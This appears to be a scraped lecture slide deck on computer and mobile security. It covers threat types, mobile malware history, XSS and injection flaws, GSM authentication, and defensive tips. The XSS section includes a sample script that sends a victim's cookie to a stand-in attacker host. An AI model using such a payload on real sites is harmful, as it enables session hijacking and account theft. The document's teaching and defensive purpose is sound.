View
108
Download
0
Category
Tags:
Preview:
DESCRIPTION
Citation preview
Security and Communication
Security Concept
Security is the process of preventing and detecting unauthorized use
Prevention measures help you to stop unauthorised users (intruders) from accessing
Detection helps you to determine whether or not someone attempted to break into
There is no system that is absolutely secure, any form of security can be broken
In order to have a secure system, it is useful to understand The mobile vulnerabilities – the
loopholes / weaknesses of our mobile or network
The security threats – attacks against computer vulnerabilities
Current threats by mobile malware
For financial gain / loss Unnecessary calls / SMS / MMS Send and sell private information
Cause phones to work slowly or crashWipe out contact books and other information on the phone
Remote control of the phoneInstall “false” applications
Several types of attacks relevant to small
devices
Attacks on authentication Attacks on services Attacks on protocols
Attacks on authentication: Often called a dictionary attack or password attack, these assaults make repeated attempts to break through authentication barriers by guessing the identification or private information, interpreting the responses, and trying again with a new guess.
Attacks on services: these types of attacks target known bugs in the implementations of services. The idea is to either crash the service or to put the implementation into some kind of error mode that gives access to other system functions. This is usually done by accessing “boundary conditions”; overloading internal buffers or using untested commands. On a small device, a crash can be lethal, bringing the device down to an inoperable state and potentially losing valuable data
Attacks on protocols: Again, these attacks focus on bugs in protocol implementations. The idea here is to force the device into a state that will accept any command or simply freeze the machine.
Threats and vulnerabilities in wireless networks
and handheld devices All the vulnerabilities that exist in a conventional
wired network apply to wireless technologies. Malicious entities may gain unauthorized access to
an organization’s computer network through wireless connection, by passing any firewall protections.
Sensitive information that is not encrypted and that is transmitted between two wireless devices may be intercepted and disclosed.
Denial of service attacks may be directed at wireless connection or devices.
Sensitive data may be corrupted during improper synchronization.
Malicious entities may be able to violate the privacy of legitimate users and be able to track their movements.
Handheld devices are easily stolen and can reveal sensitive information.
Data may be extracted without detection from improperly configured devices.
More than 80% of enterprise's digitized information reside in individual hard drives and in personal files and 80% of the data is unstructured, not secure nor backed up.
Individuals hold the key to the knowledge economy and most of it is lost when they leave the enterprise
Employees get 50%-75% of their relevant information directly from other people
Today’s Information Challenge
Source: Gartner Group/CIBC World Markets
ConfidentialityEnsure privacy of user
information and transmission
IntegrityEnsure accuracy of data
and data processing
AvailabilityMaximize functionality and
uptime
TrustConfidence to transact
Security principles
To protect your system against those attacks, information security is also focused on these three areas:
Confidentiality – ensuring that only appropriate access is allowed to data. Confidentiality is accomplished by some form of cryptographic technique. With that, only the intended recipient of a message can make sense of it.
Integrity – ensuring changes on information are made only by authorised people.
Availability – ensuring that required data is accessible.
Internet Security Vulnerabilities
The term vulnerability is applied to weakness in a system which allows an attacker to violate the integrity of that system. Vulnerabilities may result from software bugs, settings on operating system, weak password, computer virus, and etc.
Browsers
Browsers provide an environment to run scripts. Un-patched or older versions of Internet Explorer contain
multiple vulnerabilities that can lead to memory corruption, spoofing and execution of arbitrary scripts (run by chance randomly and informally, not by necessity or principle) or code.
Remote code can be executed without any user interaction when a user visits a malicious web page or reads a malicious/harmful email.
With the explosion of rich content in web sites, the use of browser Helper Object and third-party plug-ins has increased to access various MIME file types such as multimedia and documents. Plug-ins that support client-side scripting (such as Flash and Shockwave) enable access to third party file formats.
Many of the plug-ins are installed (semi-)transparently by a website without users’ awareness. The additional plug-ins introduce more avenues for hackers to exploit to compromise computers of users visiting malicious web sites.
Operating Systems
The operating system is the foundation on which online applications are built.
Weaknesses in the operating system can be used to compromise security in the server regardless of security settings of applications.
Key vulnerabilities in an OS include: Insecure default settings – basic configuration and
account settings Web server flaws – HTTP GET method and other bugs CGI script flaws – mishandling of malicious input Denial of Service – can’t respond to too many request Weak Authentication – using default password, weak
password or no password Software holes – buffer overruns, registry.
Server settings
Ecommerce servers typically include front-end web servers and connections to back-end database
Software flows in any of the ecommerce servers represent a serious security vulnerability in the system
The error messages display by MS SQL Server allows attackers to find out information on the database.
Data stored on the server is usually not encrypted. Many servers are keeping large number of ports open Not having backup or incomplete backup would disable the
recovering from attack. No filtering of packets results in no verification on the
legitimacy of packets addresses coming in and out of your network.
Not keeping regular network logs impairs the ability to analyse network traffics especially to tell if an attack such as DOS is launched.
Software / Web Applications Bugs
Software flows in any of the ecommerce servers represent a serious security vulnerability in the system
The programmer may leaves an exploitable bug in a software which allows attacker to misuse an application, for example, bypassing access control checks or executing commands on the system hosting the application.
Failure to check the size of data buffers, which can then be overflowed, causing corruption of the stack or heap areas of memory including causing the computer to execute code provided by the attacker.
The error messages provided by the programmer based upon different inputs supply useful information for attackers. The common attack occurs in the login function.
Network Channels
Internet is an insecure channel for sending messages.
Transmission over the Internet can be interrupted easily by people with bad intention.
Communication devices such as router, gateway or switch are common attacking targets
Threats / Attacks Cross-side Scripting (XSS) XSS flaws occur whenever an application takes
data that originated from a user and sends it to a web browser without first validating or encoding that content.
XSS allows attackers to execute script in the victim’s browser, which can hijack user session, deface web sites, insert hostile content, conduct phishing attacks (commit fraud to get financial info), and take over the user’s browser using scripting malware. The popular malicious scripts are JavaScript, VBScript ActiveX and Flash.
<script>document.location= 'http://attackherhost.example/cgi-bin/cookiesteal.cgi? '+document.cookie</script>
The following are samples of XXS:
The script sends the user’s cookie to attacker’s host.
Injection Flaws There are many types of injections: SQL,
LDAP, XPath, XSLT, HTML, XML, OS command and etc. XXS is part of inject flaws.
Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. Attackers trick the interpreter into executing unintended commands via supplying specially crafted data.
Inject flaws allow attackers to create, read, update or delete any data available to the application. The worst scenario, these flaws allow an attackers to completely compromise the application and underlying system, even bypassing deeply nested firewalled environment.
Buffer overflow
Buffer overflow or buffer overrun refers to condition where a process attempts to store data beyond the boundaries of a fixed-length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data, and may result in erratic program behaviour, memory access exception, program termination, incorrect results or breaching of system security.
Malicious File Execution
Malicious file execution vulnerabilities are found in many applications
This allows attackers to perform: Remote code execution Remote root kit installation and
complete system compromise On Windows, internal system
compromise may be possible through the use of PHP’s SMB file wrappers
Trojan horse programs
Trojan horse programs are a common way for intruders to trick you (sometimes referred to as "social engineering") into installing "back door" programs.
These can allow intruders easy access to your computer without your knowledge, change your system configurations, or infect your computer with a computer virus.
E.g: BackOrifice, Netbus, and SubSeven.
Email spoofing
when an email message appears to have originated from one source when it actually was sent from another source
is often an attempt to trick the user into making a damaging statement or releasing sensitive information (such as passwords)
Denial-of-Service (DoS)
is an attack that causes your computer to crash or to become so busy processing data that you are unable to use it.
Unprotected Windows shares
can be exploited by intruders in an automated way to place tools on large numbers of Windows-based computers attached to the Internet.
Because site security on the Internet is interdependent, a compromised computer not only creates problems for the computer's owner, but it is also a threat to other sites on the Internet.
Chat clients
provide a mechanism for information to be transmitted bi-directionally between computers on the Internet
provide groups of individuals with the means to exchange dialog, web URLs, and in many cases, files of any type
many chat clients allow for the exchange of executable code, they present risks similar to those of email clients
Packet sniffing
Is a program that captures data from information packets as they travel over the network
That data may include user names, passwords, and proprietary information that travel over the network in clear text
Dictionary or Brute Force Attack
Programs that are used to defeat a cryptographic by trying to determine its decryption
Tries every possible code, combination until it finds the right one. It requires a long time to get to the correct guest but eventually it will reach the answer.
The common one is to crack the passwords used by the users
Handset Security Issues (1)
People store a wealth of information on their handsets and don’t think about securing them!
Incoming, outgoing, missed calls SMS (text) and MMS messages E-mail Instant-messaging (IM) logs Multimedia, e.g., pictures, music, videos Personal calendars Address books
Clearly, handset security is a vitally important challenge
Handset Malware History (1)
Hackers are already attacking handsets Most well-known case: a 17-year-old
broke into Paris Hilton’s Sidekick handset Less well-known: worms, viruses, and
Trojans have targeted handsets since 2004
2004: Cabir worm released by “29A,” targets Symbian
phones via Bluetooth Duts virus, released by same group, targets
Windows Mobile phones Brador Trojan released by same group, opens
backdoor on Windows Mobile
Case Study – CABIR
First mobile wormOnly as Proof-Of-ConceptSpread vector – BluetoothInfected file – caribe.sis15 new variants exist
Case Study - ComWar
Second landmark in mobile wormsSpread vector - Bluetooth and MMSLarge spread area due to MMSNot as proof of concept – Intention to harm by charging the mobile user
Multiple variants detected
Case Study - CardTrap
First cross-over mobile virus foundCan migrate from mobile to PCPropogates as infected mobile application as well as Windows worm
2 variants found – Both install with legitimate applications – Black Symbian and Camcorder Pro
Handset Malware History (2)
2005: CommWarrior worm released; replicates via Bluetooth,
MMS messages to all contacts in address book Doomboot Trojan released; claims to be “Doom 2” video
game, installs Cabir and CommWarrior 2006:
RedBrowser Trojan released; claims to be a Java program, secretly sends premium-rate SMS messages to a Russian phone number
FlexiSpy spyware released; sends log of phone calls, copies of SMS/MMS messages to Internet server for third party to view
2008: First iPhone Trojan released
Of course, other mobile malware has been released; some malware completely disables the handset
There is also the possibility of mobile botnets
Android.Pjapps – Risk Level 1: Very Low
Android.Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.
Discovered: February 22, 2011
The images below show the installation process of a clean Steam Window application and a
malicious one
When the Trojan is executed, it requests permissions to perform the following actions:
Open network sockets Send and monitor incoming SMS
messages Read and write to the user's browsing
history and bookmarks Install packages Write to external storage Read the phone's state (i.e. out of
service, radio off, etc)
Android.Pjapps - Removal
Discovered: February 22, 2011Updated: February 23, 2011 3:45:36 AMType: Trojan
Open the Google Android Menu. Go to the Settings icon and select
Applications. Next, click Manage. Select the application and click the
Uninstall button.
Key Handset Security Problems
“At this point, mobile device capability is far ahead of security.” – Prof. Patrick Traynor, Georgia Tech (emphasis added)
Handset information can be stolen Transient information: Enhanced 911 can provide user location
information Static information: “BlueSnarfing” attacks (connection without
owner’s knowledge), cracking Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA)
Theft of service attacks, e.g., premium-rate calls/SMS messages Denial-of-service attacks
Flooding attacks overload the handset radio with garbage Power-draining attacks attempt to drain the battery
Botnets and DoS attacks against networks are likely in the future Cybercriminals make 10× as much as security researchers!
Jailbroken iPhones and Upgrades
When a jail broken iPhones gets an OS upgrade, the jailbreak gets reversed and would typically need to be redone.
This may cause some users of jail broken iPhones to be reluctant to apply upgrades (even upgrades with critical security patches!), until the newly released version of iOS also gets jailbroken.
That’s obviously a security issue and cause for concern.
Greenpois0n for iOS 4.2.1
But Beware Fake Jailbreaking Apps
And When You Do Get Successfully Jailbroken
If you do successfully jailbreak your iPhone (with an app that’s not malicious in and of itself!), your exposure to OTHER malware will increase.
Some of the malware which has targeted jailbroken iPhones has targeted unchanged OpenSSh passwords for the root and/or mobile accounts (which defaulted to “alpine”) :
-- the “ikee” worm (aka “RickRolling” worm)
-- the “Duh” worm (which changed “alpine” to “ohshit”, scanned for other vulnerable iPhones, and stole data)
-- the "iPhone/Privacy.A” (stole data/opened a backdoor)
The “ikee” Worm
The “Duh” Worm
Mobile Malware May Exploit Vulnerable Apps
For example, just as Adobe Reader has been a popular target for malware on traditional desktop and laptop computers, Adobe Reader is also a popular attack vector on handheld mobile devices.
PDF Vulnerabilities on the iPhone
mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/
App Vetting and Third Party App Sources
While regular iPhones usually get apps from the iTune Apps Store, jail broken phones can get apps from 3rd party repositories such as Cydia.
It is unclear how much vetting new apps get before being listed at Cydia.
The problem of rogue applications is not unique to just the iPhone…
A Sample Malicious Android Application
Threats to Network Operator
GSM not immune to interception It is possible for the network to order the MS to switch on
and off encryption at times of high loading This signal can be spoofed using a man-in-the-middle attack
Operator BTSLegitimate Subscriber Man-in-the-middle
1. Attempt to register using encryption
3. Authenticates
Spoofing BTS
Spoofing MS
2. Passes on the registration request
4. Passes on authentication
5. Dials a number
6. Requests MS switch off encryption 7. Encrypts then passes on the call request
8. Call proceeds wit MIM eavesdropping
GSM Security Operation
GSM networks utilize encryption for three purposes:
Authentication Encryption Key generation
GSM Security Operation (Cont..)
GSM provides authentication of users and encryption of the traffic across the air interface.
This is accomplished by giving the user and network a shared secret, called Ki. This 128-bit number is stored on the SIM-card, and is not directly accessible to the user.
Each time the mobile connects to the network, the network authenticates the user by sending a random number (challenge) to the mobile.
The SIM then uses an authentication algorithm to compute an authentication token SRES using the random number and Ki.
GSM Security Operation (Cont..)
The mobile sends the SRES back to the network which compares the value with an independently computed SRES.
At the same time, an encryption key Kc is computed. This key is used for encryption of subsequent traffic across the air interface.
Thus, even if an attacker listening to the air traffic could crack the encryption key Kc, the attack would be of little value, since this key changes each time the authentication procedure is performed
Mitigation Strategies Handset manufacturers, OS & software vendors, and
researchers have worked to counter threats Symbian OS requires apps to be cryptographically signed
in order for them to run without user approval Some handset manufacturers have joined the Trusted
Computing Group (TCG) and added hardware to thwart malware tampering with the device
The iPhone runs each application in a “sandbox” to prevent malware from running on the device
Heterogeneous handset OSes make massive malware outbreaks difficult
Vendors like McAfee, Symantec, and Trend Micro sell security software for handsets; F-Secure has bundled its software with Hong Kong provider CSL’s handsets
Researchers have worked on modeling malware propagation on networks, detecting power-draining attacks, etc.
Methods/Techniques to Secure your Data / System
Protection from injection flaws Use appropriate input validation Use strongly typed parameterized
query APIs Enforce least privilege Avoid detailed error messages Do not use simple escaping functions Disable scripting features in browser
and email programs
Use virus protection software Don't open unknown email
attachments or run programs of unknown origin
Use good password and change password frequently
Turn off unnecessary services and ports running on server
Use firewall
Use Virtual Private Network (VPN)
Use encryption Turn off your computer or
disconnect from the network when not in use
Keep all applications, including your operating system, patched
Make regular backups of critical data
Make a boot disk in case your computer is damaged or compromised
Have a security policy
8 Steps to Secure Your Computer
Required1. Safely Install Your Computer’s Operating System 2. Keep Your Operating System Up To Date3. Install and Update Anti-Virus Software4. Use Strong Passwords
Strongly Recommended5. Enable Firewall Protection6. Install and Use Spyware Removal Tools7. Back Up Important Files8. Enable Screen Saver Passwords
What is Defense in Depth
A "Defense in Depth" Strategy employs multiple layers of protection between the control system and the outside world (potential attackers).
Defense in Depth Using a layered approach:
Increases an attacker’s risk of detection Reduces an attacker’s chance of success
Policies, Procedures, & Awareness
Policies, Procedures, & Awareness
OS hardening, update management, OS hardening, update management, authenticationauthentication
Firewalls, VPN quarantineFirewalls, VPN quarantine
Guards, locks, tracking devices, Guards, locks, tracking devices, HSMHSM
Network segments, IPSec, NIDSNetwork segments, IPSec, NIDS
Application hardening, antivirusApplication hardening, antivirus
ACL, encryptionACL, encryption
User education against social User education against social engineeringengineering
Physical SecurityPhysical Security
PerimeterPerimeter
Internal NetworkInternal Network
HostHost
ApplicationApplication
DataData
The Identity Lifecycle
New User User ID Creation Credential Issuance Access Rights
Account Changes Promotions Transfers New Privileges Attribute Changes
Password Mgmt Strong Passwords “Lost” Password Password Reset
Retire User Delete/Freeze Accounts Delete/Freeze Entitlements
Architecture
Security Risk Analysis
A simplified approach, taking into account your assets exposure to security risks
Requires:1. Identifying your assets2. Assesing risks and their impact,
probability and exposure3. Formulating plans to reduce overall
risk exposure
Threat Modeling
Structured analysis aimed at: Finding infrastructure
vulnerabilities Evaluating security
threats Identify
countermeasures
Originated from software development security threat analysis
1. Identify Assets1. Identify Assets
2. Create an Architecture Overview2. Create an Architecture Overview
3. Decompose the System3. Decompose the System
4. Identify the Threats4. Identify the Threats
5. Document the Threats5. Document the Threats
6. Rate the Threats6. Rate the Threats
Email Safety Tips
1. Do not open unexpected attachments.
2. Use Spam Filters
3. Beware of Spoof Emails or Phishing.
4. Don’t send sensitive data in email.
5. Avoid clicking on links in the body of an email
message.
While these links may not be a phishing attempt, they may
not go to the site you intend. Unless you are completely
comfortable that the email is legitimate, it is best to copy and
paste the link or type it in directly in your browser.
Managing Spam Email
Spam is often more of an annoyance than a security risk. However many email viruses are sent as spam and can be caught by spam filters.
Spoof Email (Phishing)
6 Ways to Recognize Phishing1. Generic Greeting
For example, “Dear Customer”.2. Sense of urgency.
May include an urgent warning requiring immediate action.3. Account status threat.
May include a warning that your account will be terminated unless you reply.
4. Forged email address.The sender’s email address may be forged, even if it looks legitimate.
5. Forged links to Web sites.There is often a link to a Website to “fix” the problem. These are usually forged.
6. Requests for personal information.Asking for login and password info, either in email or via the link.
Phishing emails are an attempt by thieves to lure you into divulging personal and financial information, for their profit. They pretend to be from well-known legitimate businesses, and increasingly look as if they actually are. They use clever techniques to induce a sense of urgency on your part so that you don't stop to think about whether they are legitimate or not. You can learn to know what to look for and where to report these scams when you find them.
Don’t Send Sensitive Data in Email
The Risks of Sending Sensitive Data in Email1. Sending email is insecure.2. You are storing sensitive data on your computer.3. You no longer control the sensitive data.4. The sensitive data may be sent to others without
your knowledge.
Alternatives to Sending Sensitive Data in Email Faculty, Staff, and Grad Students can use their
WebFiles account. You can then share the information by using permissions or tickets.
Although it's convenient to send colleagues sensitive data in email, it is unsafe. Not only is email an insecure way of sending information, you've lost control over that information once you hit the send button.
Mobile security tips
Here’s what you can do to protect yourself now:
Be alert. Don’t leave your handheld laying out on a café table or in an outside pocket of your purse or backpack. Don’t carry it in a jacket or any other place where a pickpocket could easily snatch it.
Password-protect your handhelds. Use strong password and PINs to make it difficult for thieves to access them. Consider using a third-party “padlock” program to give yourself extra protection.
Make backups. Just as you would for your PC or Mac, set up a regular backup schedule for the information on your mobile devices.
Limit the amount of confidential data you carry on your handhelds. Use memory sticks or another removable medium to store sensitive information.
Encrypt your most important files. A number of third-party software programs give you the ability to encrypt handheld data.
Protect your handhelds with security software. Norton Smartphone Security protects your smart phone from viruses and intruders.
Use secure wireless connections. If you can’t find one, save important transmissions until you can connect to a secure environment.
Disable Bluetooth and wireless signals when they’re not in use.
Use the same savvy surfing habits you do when connected over a land line. That means verifying the authenticity of email attachments, downloads, and Web sites.
Kaspersky Mobile Security
Locate a lost or stolen smartphone Secure contacts, photos and files
from unauthorized access Privacy Protection - for your eyes only Block unwanted calls or SMSs Parental control Protect your smart phone from malware and network attacks More info : http://www.kaspersky.com/kaspersky_mobile_security
Security risk assessment
The following table lists the areas that are included in the security risk assessment Infrastructure Applications Operations People
Infrastructure
Applications
Operations
People
Recommended